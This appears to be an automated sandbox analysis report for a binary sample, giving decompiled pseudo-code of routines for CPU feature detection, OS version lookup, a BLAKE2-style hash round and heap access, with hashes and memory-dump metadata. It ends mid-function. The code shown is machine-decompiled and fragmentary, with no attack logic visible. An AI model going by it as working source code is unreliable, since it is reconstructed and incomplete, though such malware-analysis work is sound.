0x00c91c30
0x00c91c37
0x00c91c39
0x00c91c39
0x00c91c40
0x00c91c42
0x00c91c42
0x00c91c49
0x00c91c4b
0x00c91c4b
0x00c91c52
0x00c91c54
0x00c91c54
0x00c91c61
0x00c91c64
0x00c91c9b
0x00c91c66
0x00c91c66
0x00c91c69
0x00c91c94
0x00c91c89
0x00c91c89
0x00c91c9d
0x00c91ca5
0x00c91ca8
0x00c91cc7
0x00c91ccc
0x00c91ccc
0x00c91cce
0x00c91cd3
0x00c91cdf
0x00c91cd5
0x00c91cd8
0x00c91cd8
0x00c91ce4
0x00c91ce4
0x00c91caa
0x00c91cad
0x00c91cbc
0x00000000
0x00c91cbc
0x00c91caf
0x00c91cb2
0x00c91cb4
0x00c91cb4
0x00000000
0x00c91cb2
0x00c91c6b
0x00c91c6e
0x00c91c84
0x00000000
0x00c91c84
0x00c91c73
0x00c91c75
0x00c91c75
0x00c91c73
0x00000000
0x00c91c64
0x00c91b66
0x00c91b74
0x00c91b7c
0x00000000
0x00c91b7c
0x00c91b6a
0x00c91b6f
0x00c91b6f
0x00000000
0x00c91b6a
0x00c91b27
0x00c91b35
0x00c91b3d
0x00000000
0x00c91b3d
0x00c91b2b
0x00c91b30
0x00c91b30
0x00c91b2b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C919EF,?,?,00000008,?,?,00C9168F,00000000), ref: 00C91C21

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: bf901c396c67717ddfaecc918ff1cb4c57b8fc522f9be2ae541c76c0a72798a7
Instruction ID: 1bc7f99b1951c27990f12b80be5ba2debbf3281afcb68a8f59bb69184fc07b1c
Opcode Fuzzy Hash: bf901c396c67717ddfaecc918ff1cb4c57b8fc522f9be2ae541c76c0a72798a7
Instruction Fuzzy Hash: 20B14F75210609DFDB15CF28C48AB657BE1FF45364F298698E8A9CF2A1C335DE91CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F654 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C7F654(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0xcc1d20 =  *0xcc1d20 & 0x00000000;
				 *0xc9e7a0 =  *0xc9e7a0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xcc1d24;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xcc1d24 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xc9e7a0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xcc1d20 = 1;
					 *0xc9e7a0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xcc1d20 = 2;
						 *0xc9e7a0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xc9e7a0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xcc1d20 = 3;
								 *0xc9e7a0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xcc1d20 = 5;
									 *0xc9e7a0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xc9e7a0 =  *0xc9e7a0 | 0x00000040;
										 *0xcc1d20 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0xcc1d24 | 0x00000001;
					 *0xcc1d24 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00c7f654
0x00c7f657
0x00c7f661
0x00c7f672
0x00c7f824
0x00c7f827
0x00c7f827
0x00c7f678
0x00c7f67e
0x00c7f683
0x00c7f687
0x00c7f68b
0x00c7f68d
0x00c7f68f
0x00c7f692
0x00c7f697
0x00c7f6a0
0x00c7f6b1
0x00c7f6bc
0x00c7f6c2
0x00c7f6c3
0x00c7f6c9
0x00c7f6cc
0x00c7f6d6
0x00c7f6d9
0x00c7f6dc
0x00c7f6df
0x00c7f724
0x00c7f724
0x00c7f72a
0x00c7f72a
0x00c7f72f
0x00c7f730
0x00c7f736
0x00c7f768
0x00c7f738
0x00c7f73a
0x00c7f73b
0x00c7f741
0x00c7f744
0x00c7f746
0x00c7f749
0x00c7f74c
0x00c7f74f
0x00c7f752
0x00c7f75b
0x00c7f760
0x00c7f760
0x00c7f75b
0x00c7f76b
0x00c7f770
0x00c7f773
0x00c7f77d
0x00c7f788
0x00c7f78e
0x00c7f791
0x00c7f79b
0x00c7f7a6
0x00c7f7b2
0x00c7f7b5
0x00c7f7b8
0x00c7f7c3
0x00c7f7c8
0x00c7f7ca
0x00c7f7cf
0x00c7f7d2
0x00c7f7dc
0x00c7f7e4
0x00c7f7e9
0x00c7f7f3
0x00c7f801
0x00c7f814
0x00c7f81b
0x00c7f81b
0x00c7f801
0x00c7f7e4
0x00c7f7c8
0x00c7f7a6
0x00000000
0x00c7f823
0x00c7f6e4
0x00c7f6ee
0x00c7f719
0x00c7f71c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C7F66A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1cecc15aac797d587bcd161e1ba05d3223ebbeca9a0ca0c05a3b63597024ec9f
Instruction ID: 1fed3fc5efcfdff06eb4ec96c727ea89e414c3b8cae6cabb949b71f1556d9b63
Opcode Fuzzy Hash: 1cecc15aac797d587bcd161e1ba05d3223ebbeca9a0ca0c05a3b63597024ec9f
Instruction Fuzzy Hash: DC518DB19006198FDB29CF99E8C57AEB7F0FB48354F24C42AC819EB291D3749E01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B146 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6B146() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xc9e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xca10a8;
					_t13 =  *0xca10ac;
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xc9e020 = _t12;
					 *0xca10a8 = _t6;
					 *0xca10ac = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x00c6b149
0x00c6b158
0x00c6b196
0x00c6b19b
0x00c6b15a
0x00c6b160
0x00c6b16b
0x00c6b171
0x00c6b177
0x00c6b17d
0x00c6b183
0x00c6b189
0x00c6b18e
0x00c6b18e
0x00c6b1a4
0x00c6b1b3
0x00c6b1a6
0x00c6b1ac
0x00c6b1ac

APIs

GetVersionExW.KERNEL32(?), ref: 00C6B16B

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 6c779ab4a92dd0c2e243c49e479a84fe66c42edb2966d684a068b3c02e77cb8f
Instruction ID: fb95b9d9cfc655a2c18b2589f361ac6977d767a8c1787bc5b97ed20868afaf96
Opcode Fuzzy Hash: 6c779ab4a92dd0c2e243c49e479a84fe66c42edb2966d684a068b3c02e77cb8f
Instruction Fuzzy Hash: 7DF017B5E002589FDB28CB18EC967DE77F1EB9A719F144296D91593390C3B0AEC08E60

Uniqueness

Uniqueness Score: -1.00%

Function 00C640FE Relevance: 1.5, Strings: 1, Instructions: 276
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00C640FE() {
				signed int* _t187;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t216;
				signed int _t217;
				signed int _t224;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t239;
				signed int _t240;
				signed int _t245;
				signed int _t246;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				signed int _t286;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int _t299;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t310;
				void* _t311;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				intOrPtr _t329;
				signed int _t331;
				signed int _t332;
				intOrPtr _t335;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				signed int _t344;
				signed int _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr _t349;
				intOrPtr _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				intOrPtr _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;

				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
				_t187 =  *(_t295 + 0xf8);
				_t258 =  *_t187 ^ 0x510e527f;
				_t352 = _t187[1] ^ 0x9b05688c;
				_t266 = 0x10;
				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
				_t363 = _t362 + 0xc;
				_push(8);
				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
				_t364 = _t363 + 0xc;
				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
				_t272 =  *(_t364 + 0x6c);
				_t335 = 0;
				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
				 *(_t364 + 0x38) =  *(_t364 + 0x74);
				 *(_t364 + 0x18) = 0x6a09e667;
				 *(_t364 + 0x24) = 0xbb67ae85;
				 *(_t364 + 0x2c) = 0x3c6ef372;
				 *(_t364 + 0x34) = 0xa54ff53a;
				 *((intOrPtr*)(_t364 + 0x14)) = 0;
				 *(_t364 + 0x30) =  *(_t364 + 0x70);
				 *(_t364 + 0x10) = _t272;
				do {
					_t27 = _t335 + 0xc936c0; // 0x3020100
					_t31 = _t364 + 0x18; // 0x6a09e667
					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
					_t297 = _t320 ^ _t258;
					_t259 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t274 =  *_t31 + _t297;
					_t337 = _t274 ^  *(_t364 + 0x10);
					asm("ror esi, 0xc");
					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xc936c1) & 0x000000ff) * 4)) + _t337 + _t320;
					 *(_t364 + 0x18) = _t200;
					_t201 = _t200 ^ _t297;
					asm("ror eax, 0x8");
					 *(_t364 + 0x3c) = _t201;
					_t202 = _t201 + _t274;
					 *(_t364 + 0x48) = _t202;
					asm("ror eax, 0x7");
					 *(_t364 + 0x50) = _t202 ^ _t337;
					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xc936c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
					_t299 = _t323 ^ _t352;
					_t353 =  *(_t364 + 0x38);
					asm("rol edx, 0x10");
					_t276 =  *(_t364 + 0x24) + _t299;
					_t339 = _t276 ^  *(_t364 + 0x30);
					asm("ror esi, 0xc");
					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xc936c3) & 0x000000ff) * 4)) + _t339 + _t323;
					 *(_t364 + 0x10) = _t208;
					_t209 = _t208 ^ _t299;
					asm("ror eax, 0x8");
					 *(_t364 + 0x44) = _t209;
					_t210 = _t209 + _t276;
					 *(_t364 + 0x58) = _t210;
					asm("ror eax, 0x7");
					 *(_t364 + 0x24) = _t210 ^ _t339;
					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xc936c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
					_t301 = _t342 ^  *(_t364 + 0x20);
					asm("rol edx, 0x10");
					_t278 =  *(_t364 + 0x2c) + _t301;
					_t354 = _t353 ^ _t278;
					asm("ror ebp, 0xc");
					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xc936c5) & 0x000000ff) * 4)) + _t354 + _t342;
					 *(_t364 + 0x40) = _t216;
					_t217 = _t216 ^ _t301;
					asm("ror eax, 0x8");
					 *(_t364 + 0x54) = _t217;
					_t260 = _t217 + _t278;
					_t355 =  *((intOrPtr*)(_t364 + 0x14));
					asm("ror eax, 0x7");
					 *(_t364 + 0x20) = _t260 ^ _t354;
					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xc936c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
					_t303 = _t326 ^  *(_t364 + 0x28);
					asm("rol edx, 0x10");
					_t280 =  *(_t364 + 0x34) + _t303;
					_t344 = _t280 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xc936c7) & 0x000000ff) * 4)) + _t344 + _t326;
					 *(_t364 + 0x4c) = _t224;
					_t328 = _t224 ^ _t303;
					asm("ror edi, 0x8");
					_t356 = _t328 + _t280;
					asm("ror eax, 0x7");
					 *(_t364 + 0x1c) = _t356 ^ _t344;
					_t98 = _t364 + 0x18; // 0x6a09e667
					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0xc936c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
					_t305 = _t283 ^ _t328;
					_t329 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t345 = _t305 + _t260;
					_t262 = _t345 ^  *(_t364 + 0x24);
					asm("ror ebx, 0xc");
					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xc936c9) & 0x000000ff) * 4)) + _t262 + _t283;
					 *(_t364 + 0x5c) = _t232;
					_t233 = _t232 ^ _t305;
					asm("ror eax, 0x8");
					 *(_t364 + 0x28) = _t233;
					 *(_t364 + 0x98) = _t233;
					_t234 = _t233 + _t345;
					_t263 = _t262 ^ _t234;
					 *(_t364 + 0x2c) = _t234;
					 *(_t364 + 0x84) = _t234;
					asm("ror ebx, 0x7");
					 *(_t364 + 0x30) = _t263;
					 *(_t364 + 0x70) = _t263;
					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xc936ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
					_t265 = _t286 ^  *(_t364 + 0x3c);
					asm("rol ebx, 0x10");
					_t306 = _t265 + _t356;
					_t358 = _t306 ^  *(_t364 + 0x20);
					asm("ror ebp, 0xc");
					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xc936cb) & 0x000000ff) * 4)) + _t358 + _t286;
					_t258 = _t265 ^ _t239;
					 *(_t364 + 0x60) = _t239;
					asm("ror ebx, 0x8");
					_t240 = _t306 + _t258;
					_t359 = _t358 ^ _t240;
					 *(_t364 + 0x34) = _t240;
					 *(_t364 + 0x88) = _t240;
					asm("ror ebp, 0x7");
					 *(_t364 + 0x38) = _t359;
					 *(_t364 + 0x74) = _t359;
					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xc936cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
					_t361 = _t289 ^  *(_t364 + 0x44);
					asm("rol ebp, 0x10");
					_t308 =  *(_t364 + 0x48) + _t361;
					_t347 = _t308 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xc936cd) & 0x000000ff) * 4)) + _t347 + _t289;
					_t352 = _t361 ^ _t245;
					 *(_t364 + 0x64) = _t245;
					asm("ror ebp, 0x8");
					_t246 = _t308 + _t352;
					_t348 = _t347 ^ _t246;
					 *(_t364 + 0x18) = _t246;
					 *(_t364 + 0x7c) = _t246;
					asm("ror esi, 0x7");
					 *(_t364 + 0x1c) = _t348;
					 *(_t364 + 0x78) = _t348;
					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xc936ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
					_t349 =  *((intOrPtr*)(_t364 + 0x14));
					_t331 = _t292 ^  *(_t364 + 0x54);
					asm("rol edi, 0x10");
					_t310 =  *(_t364 + 0x58) + _t331;
					asm("ror eax, 0xc");
					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
					_t335 = _t349 + 0x10;
					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0xc936cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
					_t332 = _t331 ^ _t253;
					 *(_t364 + 0x68) = _t253;
					asm("ror edi, 0x8");
					 *(_t364 + 0x20) = _t332;
					 *(_t364 + 0x94) = _t332;
					_t254 = _t310 + _t332;
					_t272 =  *(_t364 + 0x10) ^ _t254;
					 *(_t364 + 0x24) = _t254;
					asm("ror ecx, 0x7");
					 *(_t364 + 0x80) = _t254;
					 *(_t364 + 0x10) = _t272;
					 *(_t364 + 0x6c) = _t272;
				} while (_t335 <= 0x90);
				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
				_t311 = 0;
				 *(_t364 + 0x8c) = _t258;
				 *(_t364 + 0x90) = _t352;
				do {
					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
					_t311 = _t311 + 4;
				} while (_t311 < 0x20);
				return _t256;
			}

0x00c64104
0x00c6410e
0x00c6412a
0x00c64136
0x00c6413c
0x00c6413d
0x00c6413d
0x00c64149
0x00c6414c
0x00c6414c
0x00c6415e
0x00c64162
0x00c64166
0x00c64168
0x00c64170
0x00c64178
0x00c64180
0x00c64188
0x00c64190
0x00c64198
0x00c641a0
0x00c641a4
0x00c641a8
0x00c641ac
0x00c641ac
0x00c641bc
0x00c641c0
0x00c641c6
0x00c641c8
0x00c641cc
0x00c641cf
0x00c641d3
0x00c641de
0x00c641ea
0x00c641ec
0x00c641f0
0x00c641f2
0x00c641f5
0x00c641f9
0x00c641fb
0x00c64201
0x00c64204
0x00c6421e
0x00c6422b
0x00c6422d
0x00c64231
0x00c64234
0x00c6423f
0x00c64243
0x00c64248
0x00c6424a
0x00c6424e
0x00c64250
0x00c64253
0x00c64257
0x00c64259
0x00c64263
0x00c64266
0x00c64281
0x00c64287
0x00c64292
0x00c64295
0x00c64297
0x00c64299
0x00c6429e
0x00c642a0
0x00c642a4
0x00c642a6
0x00c642a9
0x00c642ad
0x00c642b4
0x00c642b8
0x00c642bb
0x00c642d1
0x00c642de
0x00c642e6
0x00c642f0
0x00c642f4
0x00c642f8
0x00c642fd
0x00c64301
0x00c64305
0x00c64307
0x00c6430a
0x00c64311
0x00c64314
0x00c6432e
0x00c6432e
0x00c64334
0x00c64336
0x00c6433a
0x00c64344
0x00c64349
0x00c64354
0x00c64359
0x00c6435b
0x00c6435f
0x00c64361
0x00c64364
0x00c64368
0x00c6436f
0x00c64371
0x00c64373
0x00c64377
0x00c64385
0x00c64388
0x00c6438c
0x00c6439b
0x00c643a8
0x00c643ac
0x00c643b6
0x00c643bb
0x00c643bf
0x00c643c4
0x00c643c6
0x00c643c8
0x00c643cc
0x00c643cf
0x00c643d2
0x00c643d4
0x00c643d8
0x00c643e6
0x00c643e9
0x00c643ed
0x00c643fc
0x00c64402
0x00c64411
0x00c64414
0x00c6441f
0x00c64423
0x00c64428
0x00c6442a
0x00c6442c
0x00c64430
0x00c64433
0x00c6443a
0x00c6443c
0x00c64440
0x00c6444b
0x00c6444e
0x00c64452
0x00c64461
0x00c64465
0x00c6446b
0x00c6446f
0x00c64472
0x00c6447a
0x00c6447d
0x00c64488
0x00c6448b
0x00c6449a
0x00c644a0
0x00c644a2
0x00c644a6
0x00c644a9
0x00c644ad
0x00c644b4
0x00c644b7
0x00c644b9
0x00c644bd
0x00c644c0
0x00c644c7
0x00c644cb
0x00c644cf
0x00c644db
0x00c644e2
0x00c644e4
0x00c644eb
0x00c644f2
0x00c644fc
0x00c64500
0x00c64503
0x00c64506
0x00c64515

Strings

gj, xrefs: 00C641BC

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 5cfd378ec3480e2beb1f9e5fa0fbdf612b3f9f7b341b74e380ac028980400b08
Instruction ID: d16ccebb8250ca0633b006fcce919c0e3b9bc8a66252dacccb5340af602ffd48
Opcode Fuzzy Hash: 5cfd378ec3480e2beb1f9e5fa0fbdf612b3f9f7b341b74e380ac028980400b08
Instruction Fuzzy Hash: 1FC12676A183818FC354CF29D88065AFBE1BFC8308F19892DE998D7311D734E959CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00C8C030 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C8C030() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xcc26e4 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00c8c030
0x00c8c038
0x00c8c040

APIs

GetProcessHeap.KERNEL32 ref: 00C8C030

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 19f73ea02ff8537bd35afcc0881b6a9e6fb8fabf73bc5b19a27c6245992eb82a
Instruction ID: 8e793f1571395e4a5cb43dbc64baa92e9d50b38c525bc5646f6a352d73a7ce0b
Opcode Fuzzy Hash: 19f73ea02ff8537bd35afcc0881b6a9e6fb8fabf73bc5b19a27c6245992eb82a
Instruction Fuzzy Hash: 5DA001706022419B97448F35AE4DB4D3AA9AA55691709406BA509C5170EB6489A0AA11

Uniqueness

Uniqueness Score: -1.00%

Function 00C762CA Relevance: .8, Instructions: 829
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00C762CA(intOrPtr __esi) {
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				signed int _t361;
				intOrPtr _t363;
				signed int _t372;
				char _t381;
				void* _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t389;
				signed int _t399;
				char _t408;
				unsigned int _t409;
				void* _t417;
				signed int _t418;
				signed int _t419;
				intOrPtr _t421;
				signed int _t424;
				char _t433;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t447;
